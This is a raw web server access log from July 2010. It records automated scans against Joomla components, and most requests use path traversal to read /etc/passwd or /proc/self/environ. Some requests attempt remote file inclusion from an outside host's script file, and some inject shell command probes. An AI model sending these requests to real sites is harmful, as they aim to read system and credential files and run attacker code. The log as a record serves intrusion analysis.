95.141.32.178 - - [27/Jul/2010:02:46:56 +0200] "GET //index.php?option=com_memory&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
95.141.32.178 - - [27/Jul/2010:02:46:56 +0200] "GET /logs//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
69.175.118.101 - - [27/Jul/2010:02:47:22 +0200] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "oi"
69.175.118.101 - - [27/Jul/2010:02:47:22 +0200] "GET /logs/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "oi"
69.175.118.101 - - [27/Jul/2010:02:47:22 +0200] "GET /logs/access_log/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "oi"
119.192.145.144 - - [27/Jul/2010:02:48:33 +0200] "GET /logs/access_log//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:02:48:33 +0200] "GET //index.php?option=com_memory&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:02:48:33 +0200] "GET /logs//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
94.23.8.200 - - [27/Jul/2010:02:51:46 +0200] "GET ///index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.803"
95.211.71.21 - - [27/Jul/2010:02:52:47 +0200] "GET /logs//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:02:52:47 +0200] "GET /logs//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:02:52:47 +0200] "GET //index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:02:52:47 +0200] "GET //index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:02:56:30 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:02:56:30 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:02:56:36 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:02:56:36 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:02:56:41 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:02:56:41 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:02:57:22 +0200] "GET /logs/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:02:57:22 +0200] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:02:57:25 +0200] "GET /logs/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:02:57:25 +0200] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:02:59:14 +0200] "GET /logs/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:02:59:14 +0200] "GET /index.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:02:59:19 +0200] "GET /logs/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:02:59:19 +0200] "GET /index.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:03:02:53 +0200] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:03:02:53 +0200] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:03:03:44 +0200] "GET /logs/index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:03:03:44 +0200] "GET /logs/index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
222.124.212.222 - - [27/Jul/2010:03:03:44 +0200] "GET /logs/access_log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.823"
95.211.71.21 - - [27/Jul/2010:03:03:44 +0200] "GET /index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:03:03:44 +0200] "GET /index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
222.124.212.222 - - [27/Jul/2010:03:03:45 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.823"
222.124.212.222 - - [27/Jul/2010:03:03:45 +0200] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.823"
95.211.71.21 - - [27/Jul/2010:03:04:03 +0200] "GET /logs/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:03:04:03 +0200] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:03:04:29 +0200] "GET /logs/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:03:04:29 +0200] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:03:04:48 +0200] "GET /logs/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:03:04:48 +0200] "GET /index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:03:04:55 +0200] "GET /logs/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:03:04:55 +0200] "GET /index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
66.249.71.87 - - [27/Jul/2010:03:07:17 +0200] "GET /logs/error_log HTTP/1.1" 200 228220 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.55.73.74 - - [27/Jul/2010:03:13:46 +0200] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
81.21.78.22 - - [27/Jul/2010:03:14:06 +0200] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.8.200 - - [27/Jul/2010:03:15:44 +0200] "GET ///index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.803"
81.21.78.22 - - [27/Jul/2010:03:19:02 +0200] "GET /logs/access_log/index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.803"
81.21.78.22 - - [27/Jul/2010:03:19:03 +0200] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
81.21.78.22 - - [27/Jul/2010:03:19:03 +0200] "GET /logs/index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
74.55.73.74 - - [27/Jul/2010:03:19:42 +0200] "GET /logs/access_log/index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.810"
74.55.73.74 - - [27/Jul/2010:03:19:43 +0200] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
74.55.73.74 - - [27/Jul/2010:03:19:43 +0200] "GET /logs/index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
94.23.8.200 - - [27/Jul/2010:03:24:25 +0200] "GET /logs/access_log///index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.803"
94.23.8.200 - - [27/Jul/2010:03:24:26 +0200] "GET ///index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.803"
94.23.8.200 - - [27/Jul/2010:03:24:26 +0200] "GET /logs///index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.803"
72.55.153.180 - - [27/Jul/2010:03:27:00 +0200] "GET /logs/access_log//?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:03:27:00 +0200] "GET //?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 666 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:03:27:00 +0200] "GET /logs//?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 802 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:03:27:32 +0200] "GET /logs/access_log//?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:03:27:32 +0200] "GET //?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 666 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:03:27:32 +0200] "GET /logs//?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 802 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:03:27:35 +0200] "GET /logs/access_log//?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:03:27:35 +0200] "GET //?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 666 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:03:27:35 +0200] "GET /logs//?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 802 "-" "libwww-perl/5.805"
78.41.233.128 - - [27/Jul/2010:03:28:29 +0200] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 797 "-" "libwww-perl/5.805"
78.41.233.128 - - [27/Jul/2010:03:28:29 +0200] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 560 "-" "libwww-perl/5.805"
91.121.67.226 - - [27/Jul/2010:03:28:37 +0200] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 797 "-" "libwww-perl/5.803"
91.121.67.226 - - [27/Jul/2010:03:28:38 +0200] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 560 "-" "libwww-perl/5.803"
112.104.57.22 - - [27/Jul/2010:03:33:08 +0200] "GET /logs/access_log%20%20///skin/board/moviefl/download.php?board_skin_path=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 338 "-" "MaMa CaSpEr"
112.104.57.22 - - [27/Jul/2010:03:33:09 +0200] "GET /logs/access_log%20%20///skin/board/moviefl/download.php?board_skin_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 338 "-" "MaMa CaSpEr"
112.104.57.22 - - [27/Jul/2010:03:33:13 +0200] "GET ///skin/board/moviefl/download.php?board_skin_path=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 320 "-" "MaMa CaSpEr"
112.104.57.22 - - [27/Jul/2010:03:33:13 +0200] "GET /logs///skin/board/moviefl/download.php?board_skin_path=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 325 "-" "MaMa CaSpEr"
112.104.57.22 - - [27/Jul/2010:03:33:13 +0200] "GET ///skin/board/moviefl/download.php?board_skin_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 320 "-" "MaMa CaSpEr"
112.104.57.22 - - [27/Jul/2010:03:33:13 +0200] "GET /logs///skin/board/moviefl/download.php?board_skin_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 325 "-" "MaMa CaSpEr"
94.23.8.200 - - [27/Jul/2010:03:35:55 +0200] "GET /logs/access_log///index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.803"
94.23.8.200 - - [27/Jul/2010:03:35:55 +0200] "GET ///index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.803"
94.23.8.200 - - [27/Jul/2010:03:35:55 +0200] "GET /logs///index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.803"
80.68.88.231 - - [27/Jul/2010:03:44:15 +0200] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 301 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6"
80.68.88.231 - - [27/Jul/2010:03:44:15 +0200] "GET /logs/access_log/index.php?option=com_ninjarsssyndicator&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6"
80.68.88.231 - - [27/Jul/2010:03:44:15 +0200] "GET /index.php?option=com_ninjarsssyndicator&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6"
80.68.88.231 - - [27/Jul/2010:03:44:15 +0200] "GET /index.php?option=com_ninjarsssyndicator&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6"
80.68.88.231 - - [27/Jul/2010:03:44:15 +0200] "GET /logs/access_log/index.php?option=com_ninjarsssyndicator&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6"
80.68.88.231 - - [27/Jul/2010:03:44:15 +0200] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 301 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6"
91.121.67.226 - - [27/Jul/2010:03:57:15 +0200] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 797 "-" "libwww-perl/5.803"
91.121.67.226 - - [27/Jul/2010:03:57:15 +0200] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 560 "-" "libwww-perl/5.803"
78.41.233.128 - - [27/Jul/2010:03:57:32 +0200] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 797 "-" "libwww-perl/5.805"
78.41.233.128 - - [27/Jul/2010:03:57:32 +0200] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 560 "-" "libwww-perl/5.805"
66.249.71.87 - - [27/Jul/2010:04:00:18 +0200] "GET /robots.txt HTTP/1.1" 404 297 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.87 - - [27/Jul/2010:04:00:18 +0200] "GET / HTTP/1.1" 200 560 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
193.47.80.51 - - [27/Jul/2010:04:00:54 +0200] "GET /robots.txt HTTP/1.1" 404 297 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
193.47.80.51 - - [27/Jul/2010:04:00:54 +0200] "GET /logs/?C=N;O HTTP/1.1" 200 797 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
95.141.32.178 - - [27/Jul/2010:04:26:42 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
95.141.32.178 - - [27/Jul/2010:04:27:28 +0200] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
213.229.106.147 - - [27/Jul/2010:04:27:38 +0200] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
213.229.106.147 - - [27/Jul/2010:04:27:38 +0200] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
95.141.32.178 - - [27/Jul/2010:04:29:22 +0200] "GET /logs/access_log//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
95.141.32.178 - - [27/Jul/2010:04:29:22 +0200] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
95.141.32.178 - - [27/Jul/2010:04:29:23 +0200] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
213.229.106.147 - - [27/Jul/2010:04:33:27 +0200] "GET /logs//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
213.229.106.147 - - [27/Jul/2010:04:33:27 +0200] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
213.229.106.147 - - [27/Jul/2010:04:33:28 +0200] "GET /logs//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
213.229.106.147 - - [27/Jul/2010:04:33:28 +0200] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
95.141.32.178 - - [27/Jul/2010:04:33:34 +0200] "GET /logs//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
95.141.32.178 - - [27/Jul/2010:04:33:34 +0200] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
95.141.32.178 - - [27/Jul/2010:04:33:46 +0200] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:04:34:20 +0200] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
95.141.32.178 - - [27/Jul/2010:04:36:32 +0200] "GET /logs/access_log//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
95.141.32.178 - - [27/Jul/2010:04:36:33 +0200] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
95.141.32.178 - - [27/Jul/2010:04:36:33 +0200] "GET /logs//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
146.83.237.120 - - [27/Jul/2010:04:36:37 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.79"
146.83.237.120 - - [27/Jul/2010:04:36:37 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
146.83.237.120 - - [27/Jul/2010:04:37:16 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
146.83.237.120 - - [27/Jul/2010:04:37:42 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
146.83.237.120 - - [27/Jul/2010:04:38:12 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
119.192.145.144 - - [27/Jul/2010:04:38:36 +0200] "GET /logs/access_log//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:04:38:36 +0200] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:04:38:37 +0200] "GET /logs//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
146.83.237.120 - - [27/Jul/2010:04:38:39 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
119.192.145.144 - - [27/Jul/2010:04:38:52 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
146.83.237.120 - - [27/Jul/2010:04:39:15 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
146.83.237.120 - - [27/Jul/2010:04:39:28 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
146.83.237.120 - - [27/Jul/2010:04:39:31 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
146.83.237.120 - - [27/Jul/2010:04:39:52 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.79"
146.83.237.120 - - [27/Jul/2010:04:39:54 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
88.131.106.3 - - [27/Jul/2010:04:40:08 +0200] "GET /robots.txt HTTP/1.0" 404 297 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)"
88.131.106.2 - - [27/Jul/2010:04:40:08 +0200] "GET /logs/?C=M%3BO=A HTTP/1.0" 200 797 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)"
146.83.237.120 - - [27/Jul/2010:04:43:01 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.79"
146.83.237.120 - - [27/Jul/2010:04:43:01 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
95.141.32.178 - - [27/Jul/2010:04:45:22 +0200] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
146.83.237.120 - - [27/Jul/2010:04:45:26 +0200] "GET /logs/access_log//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.79"
146.83.237.120 - - [27/Jul/2010:04:45:26 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
146.83.237.120 - - [27/Jul/2010:04:45:26 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.79"
119.192.145.144 - - [27/Jul/2010:04:48:58 +0200] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
